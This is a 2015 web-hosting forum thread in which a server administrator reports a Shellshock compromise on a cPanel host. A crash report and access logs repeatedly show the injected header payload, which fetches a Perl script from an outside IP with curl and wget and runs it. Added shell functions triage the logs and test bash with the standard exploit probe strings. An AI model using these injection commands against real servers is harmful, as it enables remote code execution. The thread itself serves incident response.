The Community Forums


WHM - cPanel script security folder tmp.

Discussion in 'Security' started by Morri Luca, Apr 7, 2015.

  1. Morri Luca, Member (joined Mar 19, 2015; Italia; cPanel Access Level: Root Administrator)

    Hello. This morning my server went down and I received this email from my server:

    (XXXXX = my server user)

    Subject: [abrt] full crash report
    Code:
    abrt_version:   2.0.8
    cmdline:        /bin/sh php4
    executable:     /bin/bash
    kernel:         2.6.32-220.13.1.el6.x86_64
    pid:            19131
    pwd:            /usr/local/cpanel/cgi-sys
    reason:         Process /bin/bash was killed by signal 11 (SIGSEGV)
    time:           Tue 07 Apr 2015 04:10:02 AM CEST
    uid:            507
    username:      XXXXXX
    
    sosreport.tar.xz: Binary file, 1777664 bytes
    
    environ:
    :PATH=/usr/local/bin:/usr/bin:/bin
    :HTTP_HOST=XXXXXX.COM
    :HTTP_CONNECTION=keep-alive
    :HTTP_CACHE_CONTROL=max-age=0
    :HTTP_USER_AGENT
    :'() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_COOKIE=() { :;}; /bin/bash -c \"echo xxxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_REFERER=() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    :HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
    :SERVER_SIGNATURE=
    :'SERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4'
    :SERVER_NAME=xxxxxx.com
    :SERVER_ADDR=myip
    :SERVER_PORT=80
    :REMOTE_ADDR=62.149.164.193
    :DOCUMENT_ROOT=/home/xxxxxxx/public_html
    :SERVER_ADMIN=webmaster@xxxxxxx.com
    :SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4
    :REMOTE_PORT=51684
    :GATEWAY_INTERFACE=CGI/1.1
    :SERVER_PROTOCOL=HTTP/1.1
    :REQUEST_METHOD=GET
    :QUERY_STRING=
    :REQUEST_URI=/cgi-sys/php4
    :SCRIPT_NAME=/cgi-sys/php4
    
    limits:
    :Limit                     Soft Limit           Hard Limit           Units    
    :Max cpu time              unlimited            unlimited            seconds  
    :Max file size             unlimited            unlimited            bytes    
    :Max data size             unlimited            unlimited            bytes    
    :Max stack size            10485760             unlimited            bytes    
    :Max core file size        0                    unlimited            bytes    
    :Max resident set          unlimited            unlimited            bytes    
    :Max processes             62776                62776                processes
    :Max open files            16384                16384                files    
    :Max locked memory         65536                65536                bytes    
    :Max address space         unlimited            unlimited            bytes    
    :Max file locks            unlimited            unlimited            locks    
    :Max pending signals       62776                62776                signals  
    :Max msgqueue size         819200               819200               bytes    
    :Max nice priority         0                    0                   
    :Max realtime priority     0                    0                   
    :Max realtime timeout      unlimited            unlimited            us       
    
    maps:
    :00400000-004d4000 r-xp 00000000 fd:00 3407921                            /bin/bash
    :006d3000-006dd000 rw-p 000d3000 fd:00 3407921                            /bin/bash
    :006dd000-006e2000 rw-p 00000000 00:00 0
    :008dc000-008e5000 rw-p 000dc000 fd:00 3407921                            /bin/bash
    :0210e000-0212f000 rw-p 00000000 00:00 0                                  [heap]
    :333d800000-333d820000 r-xp 00000000 fd:00 655418                         /lib64/ld-2.12.so
    :333da1f000-333da20000 r--p 0001f000 fd:00 655418                         /lib64/ld-2.12.so
    :333da20000-333da21000 rw-p 00020000 fd:00 655418                         /lib64/ld-2.12.so
    :333da21000-333da22000 rw-p 00000000 00:00 0
    :333dc00000-333dd89000 r-xp 00000000 fd:00 655456                         /lib64/libc-2.12.so
    :333dd89000-333df88000 ---p 00189000 fd:00 655456                         /lib64/libc-2.12.so
    :333df88000-333df8c000 r--p 00188000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8c000-333df8d000 rw-p 0018c000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8d000-333df92000 rw-p 00000000 00:00 0
    :333e400000-333e402000 r-xp 00000000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e402000-333e602000 ---p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e602000-333e603000 r--p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e603000-333e604000 rw-p 00003000 fd:00 655645                         /lib64/libdl-2.12.so
    :3340c00000-3340c1d000 r-xp 00000000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340c1d000-3340e1d000 ---p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340e1d000-3340e21000 rw-p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :7fdfa080b000-7fdfa080e000 rw-p 00000000 00:00 0
    :7fdfa0820000-7fdfa0821000 rw-p 00000000 00:00 0
    :7fffc1456000-7fffc146b000 rw-p 00000000 00:00 0                          [stack]
    :7fffc1550000-7fffc1551000 r-xp 00000000 00:00 0                          [vdso]
    :ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
    
    open_fds:
    :0:pipe:[121610173]
    :pos:    0
    :flags:    00
    :1:pipe:[121610174]
    :pos:    0
    :flags:    01
    :2:pipe:[121610175]
    :pos:    0
    :flags:    01
    
    After I restarted the server, I found these requests in the file /home/xxxx/access-logs/xxxxx.com:
    Code:
    62.149.164.193 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    Then I found the file ppp.jpg in my tmp folder.
    I removed everything.
    How can I prevent this malware? What can I do? Thanks.
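The access-log lines in the post above are the evidence a responder would start from, so here is the triage they call for, as an added example that is not code from the thread: shell functions that pull out the Shellshock probe lines, the source addresses, the CGI paths that were sprayed and the second-stage download URLs. The function names and the sample log are this example's own (the log lines are constructed, with documentation-range addresses and a placeholder URL standing in for the ones posted above); pipe the real file into the functions instead. One thing the log alone hides: the 500 status does not mean the payload failed. The injected command runs when bash starts, before the CGI script does, which is why ppp.jpg was already in /tmp even though every request "failed".

```shell
#!/bin/sh
# Added example, not code from the thread: triage an Apache access log from a
# cPanel host for Shellshock (CVE-2014-6271) probes like the ones posted above.
# Every function reads the log on stdin, so the same calls work on the real
# file:  shellshock_sources < /home/USER/access-logs/DOMAIN
# The log below is CONSTRUCTED for this example; its addresses, host and URL
# are documentation placeholders, not real indicators.
SAMPLE_LOG='203.0.113.7 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"cd /tmp;curl -sO http://192.0.2.10/~x/ppp.jpg;perl ppp.jpg\"" "() { :;}; /bin/bash -c \"cd /tmp;wget -q http://192.0.2.10/~x/ppp.jpg;perl ppp.jpg\""
203.0.113.7 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "-" "() { :;}; /bin/bash -c \"cd /var/spool/samba;curl -sO http://192.0.2.10/~x/ppp.jpg;perl ppp.jpg\""
198.51.100.4 - - [07/Apr/2015:04:09:01 +0200] "GET /index.html HTTP/1.1" 200 2134 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [07/Apr/2015:04:10:02 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "-" "() { :;}; /bin/bash -c \"id\""'

# The vulnerable bash executed any environment variable whose value began with
# the four characters "() {" (its exported-function format).  Apache hands the
# User-Agent, Referer and Cookie headers to a CGI as exactly such variables,
# so that literal prefix in any quoted header field is the trigger itself,
# whatever command follows it.  Fixed-string grep: no regex metacharacters.
shellshock_lines() {
    grep -F '() {'
}

# Number of probe lines in the log (0 when there are none).
shellshock_count() {
    shellshock_lines | awk 'END { print NR }'
}

# Probes per source address as "IP count", one per line, ready for a firewall
# rule or an abuse report.
shellshock_sources() {
    shellshock_lines | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' | LC_ALL=C sort
}

# CGI paths the attacker tried.  The same payload is sprayed at every known
# CGI wrapper, so the full list says which scripts exist on the box and must
# be checked, not just the one that crashed.
shellshock_targets() {
    shellshock_lines | awk -F'"' '{ split($2, r, " "); print r[2] }' | LC_ALL=C sort -u
}

# Second-stage download URLs inside the injected commands.  These are the
# IOCs: block them, and look for the fetched file names in /tmp, /var/tmp,
# /dev/shm and the spool directories the payload cd's into.
shellshock_urls() {
    shellshock_lines | grep -oE 'https?://[^ ;"\\]+' | LC_ALL=C sort -u
}

# Stand-alone demonstration on the constructed log.
printf '%s\n' "$SAMPLE_LOG" | shellshock_sources
printf '%s\n' "$SAMPLE_LOG" | shellshock_targets
printf '%s\n' "$SAMPLE_LOG" | shellshock_urls
```

On the real host the same grep over every account's log (`grep -F '() {' /home/*/access-logs/*`) shows whether other domains on the server were hit by the same sweep.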
     
  2. Morri Luca, Member (joined Mar 19, 2015; Italia; cPanel Access Level: Root Administrator)

    Hello. I found the problem. This attack is called Shellshock.

    I solved the problem and fixed the system bug.

    ausweb.com.au/tutorials/2014/09/26/check-linux-server-vulnerable-shellshock/
     
    #2 Morri Luca, Apr 8, 2015
    Last edited by a moderator: Apr 8, 2015
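The vulnerability check that the linked tutorial describes, written out as an added example (not code from the thread or from that page): two functions probe the installed bash for the original Shellshock bug (CVE-2014-6271) and for the incomplete first fix (CVE-2014-7169), and an audit wrapper turns the result into an exit status you can put in cron or run after `yum update bash`. The function names are this example's own; it assumes `bash` and `mktemp` are on PATH. Note that the payload in the logs above runs the downloaded file through `perl` rather than executing it directly, so a `noexec` /tmp would not have stopped it; updating bash is what closes the hole.

```shell
#!/bin/sh
# Added example, not code from the thread or the linked tutorial: confirm that
# the bash on this host no longer executes code smuggled in through
# environment variables.  Function names are this example's own.  Assumes
# "bash" and "mktemp" are on PATH; on a patched system both checks report
# "patched" and the audit exits 0.

# CVE-2014-6271, the original bug: a value of the form "() { :;}; <cmd>" had
# <cmd> run while the new shell imported the "function", before any script
# started.  The marker is printed only if that trailing command executed.
check_cve_2014_6271() {
    shell=${1:-bash}
    command -v "$shell" >/dev/null 2>&1 || { echo missing; return 2; }
    out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' "$shell" -c 'echo probe' 2>/dev/null) || true
    case $out in
        *SHELLSHOCK_MARKER*) echo vulnerable; return 1 ;;
        *)                   echo patched;    return 0 ;;
    esac
}

# CVE-2014-7169: the first patch left parser state behind, so a value ending
# in a dangling redirection turned the next command "echo date" into a
# redirection that created a file named "echo".  Run in a scratch directory so
# the stray file (if any) is contained and removed.
check_cve_2014_7169() {
    shell=${1:-bash}
    command -v "$shell" >/dev/null 2>&1 || { echo missing; return 2; }
    dir=$(mktemp -d) || { echo error; return 2; }
    ( cd "$dir" && env X='() { (a)=>\' "$shell" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$dir/echo" ]; then
        rm -rf "$dir"; echo vulnerable; return 1
    fi
    rm -rf "$dir"; echo patched; return 0
}

# Run both checks and return non-zero if anything is still open (or the shell
# could not be tested), so the script can gate a deployment or raise an alert.
shellshock_audit() {
    shell=${1:-bash}
    rc=0
    for id in 2014_6271 2014_7169; do
        result=$("check_cve_$id" "$shell") || rc=1
        echo "CVE-${id%%_*}-${id#*_}: $result"
    done
    return $rc
}

# Stand-alone run against the system bash.
shellshock_audit bash
```

Remember that every shell a CGI or cron job might start is in scope, so run the audit against `/bin/sh` as well if it is a link to bash, and repeat it after any later bash update.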